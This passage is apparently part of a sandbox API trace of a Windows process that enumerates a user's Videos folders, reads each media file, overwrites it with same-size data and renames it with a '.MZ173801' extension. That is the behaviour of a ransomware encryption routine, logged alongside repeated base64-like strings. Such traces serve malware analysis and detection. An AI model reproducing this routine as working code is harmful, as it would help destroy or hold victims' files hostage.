I0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.055] GetCurrentThreadId () returned 0x1358 [0121.055] GetCurrentThreadId () returned 0x1358 [0121.055] GetCurrentThreadId () returned 0x1358 [0121.055] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.055] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.056] GetCurrentThreadId () returned 0x1358 [0121.056] GetCurrentThreadId () returned 0x1358 [0121.056] GetCurrentThreadId () returned 0x1358 [0121.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\twHBtCvhRR2G5.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\twhbtcvhrr2g5.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.056] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0121.056] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.056] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x3c8d [0121.056] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.056] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3c8d, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x3c8d, lpOverlapped=0x0) returned 1 [0121.057] CloseHandle (hObject=0x3d0) returned 1 [0121.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\twHBtCvhRR2G5.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\twhbtcvhrr2g5.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.058] WriteFile (in: hFile=0x3d0, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3c8d, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f6f0*=0x3c8d, lpOverlapped=0x0) returned 1 [0121.059] CloseHandle (hObject=0x3d0) returned 1 [0121.061] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\twHBtCvhRR2G5.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\twhbtcvhrr2g5.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\twHBtCvhRR2G5.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\suu6d\\twhbtcvhrr2g5.mkv.mz173801")) returned 1 [0121.061] GetCurrentThreadId () returned 0x1358 [0121.061] GetCurrentThreadId () returned 0x1358 [0121.061] GetCurrentThreadId () returned 0x1358 [0121.061] GetCurrentThreadId () returned 0x1358 [0121.062] GetCurrentThreadId () returned 0x1358 [0121.062] GetCurrentThreadId () returned 0x1358 [0121.062] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29c41c0, ftCreationTime.dwHighDateTime=0x1d5e5ac, ftLastAccessTime.dwLowDateTime=0x3fd86650, ftLastAccessTime.dwHighDateTime=0x1d5e7ae, ftLastWriteTime.dwLowDateTime=0x3fd86650, ftLastWriteTime.dwHighDateTime=0x1d5e7ae, nFileSizeHigh=0x0, nFileSizeLow=0x3c8d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="twHBtCvhRR2G5.mkv", cAlternateFileName="TWHBTC~1.MKV")) returned 0 [0121.062] GetLastError () returned 0x12 [0121.062] FindClose (in: hFindFile=0xa1bcb0 | out: hFindFile=0xa1bcb0) returned 1 [0121.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\suu6d\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3322a480, ftCreationTime.dwHighDateTime=0x1d5ea96, ftLastAccessTime.dwLowDateTime=0xa96fb000, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa96fb000, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bb60 [0121.062] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0121.062] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.062] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3322a480, ftCreationTime.dwHighDateTime=0x1d5ea96, ftLastAccessTime.dwLowDateTime=0xa96fb000, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa96fb000, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0121.062] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.062] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.062] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f968e70, ftCreationTime.dwHighDateTime=0x1d5e9e9, ftLastAccessTime.dwLowDateTime=0x9bfd7d0, ftLastAccessTime.dwHighDateTime=0x1d5e428, ftLastWriteTime.dwLowDateTime=0xa95efe1b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x10d33, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9XOvT j3.flv.MZ173801", cAlternateFileName="9XOVTJ~1.MZ1")) returned 1 [0121.062] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.062] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.062] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7412130, ftCreationTime.dwHighDateTime=0x1d5eaa7, ftLastAccessTime.dwLowDateTime=0xee578000, ftLastAccessTime.dwHighDateTime=0x1d5e3e7, ftLastWriteTime.dwLowDateTime=0xa96d5790, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11214, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="torEQ-P8Pc0pag.flv.MZ173801", cAlternateFileName="TOREQ-~1.MZ1")) returned 1 [0121.062] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.062] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.062] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29c41c0, ftCreationTime.dwHighDateTime=0x1d5e5ac, ftLastAccessTime.dwLowDateTime=0x3fd86650, ftLastAccessTime.dwHighDateTime=0x1d5e7ae, ftLastWriteTime.dwLowDateTime=0xa96fb000, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c8d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="twHBtCvhRR2G5.mkv.MZ173801", cAlternateFileName="TWHBTC~1.MZ1")) returned 1 [0121.062] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0121.062] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.062] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29c41c0, ftCreationTime.dwHighDateTime=0x1d5e5ac, ftLastAccessTime.dwLowDateTime=0x3fd86650, ftLastAccessTime.dwHighDateTime=0x1d5e7ae, ftLastWriteTime.dwLowDateTime=0xa96fb000, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c8d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="twHBtCvhRR2G5.mkv.MZ173801", cAlternateFileName="TWHBTC~1.MZ1")) returned 0 [0121.062] GetLastError () returned 0x12 [0121.062] FindClose (in: hFindFile=0xa1bb60 | out: hFindFile=0xa1bb60) returned 1 [0121.062] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x1a33e180, ftLastAccessTime.dwHighDateTime=0x1d5e890, ftLastWriteTime.dwLowDateTime=0x1a33e180, ftLastWriteTime.dwHighDateTime=0x1d5e890, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_C-ZbiqZ3CWgavc2", cAlternateFileName="_C-ZBI~1")) returned 1 [0121.063] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.063] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.063] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x1a33e180, ftLastAccessTime.dwHighDateTime=0x1d5e890, ftLastWriteTime.dwLowDateTime=0x1a33e180, ftLastWriteTime.dwHighDateTime=0x1d5e890, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bab8 [0121.063] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x902bab80, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x1a33e180, ftLastAccessTime.dwHighDateTime=0x1d5e890, ftLastWriteTime.dwLowDateTime=0x1a33e180, ftLastWriteTime.dwHighDateTime=0x1d5e890, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0121.063] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f052b0, ftCreationTime.dwHighDateTime=0x1d5e17d, ftLastAccessTime.dwLowDateTime=0xfb442ee0, ftLastAccessTime.dwHighDateTime=0x1d5e8d7, ftLastWriteTime.dwLowDateTime=0xfb442ee0, ftLastWriteTime.dwHighDateTime=0x1d5e8d7, nFileSizeHigh=0x0, nFileSizeLow=0x635c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="JRD90ylj1Dg_Ngx4FKM.flv", cAlternateFileName="JRD90Y~1.FLV")) returned 1 [0121.063] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0121.063] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0121.063] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\_C-ZbiqZ3CWgavc2\\JRD90ylj1Dg_Ngx4FKM.flv" (normalized: "c:\\users\\fd1hvy\\videos\\_c-zbiqz3cwgavc2\\jrd90ylj1dg_ngx4fkm.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f052b0, ftCreationTime.dwHighDateTime=0x1d5e17d, ftLastAccessTime.dwLowDateTime=0xfb442ee0, ftLastAccessTime.dwHighDateTime=0x1d5e8d7, ftLastWriteTime.dwLowDateTime=0xfb442ee0, ftLastWriteTime.dwHighDateTime=0x1d5e8d7, nFileSizeHigh=0x0, nFileSizeLow=0x635c)) returned 1 [0121.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.064] GetCurrentThreadId () returned 0x1358 [0121.064] GetCurrentThreadId () returned 0x1358 [0121.064] GetCurrentThreadId () returned 0x1358 [0121.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 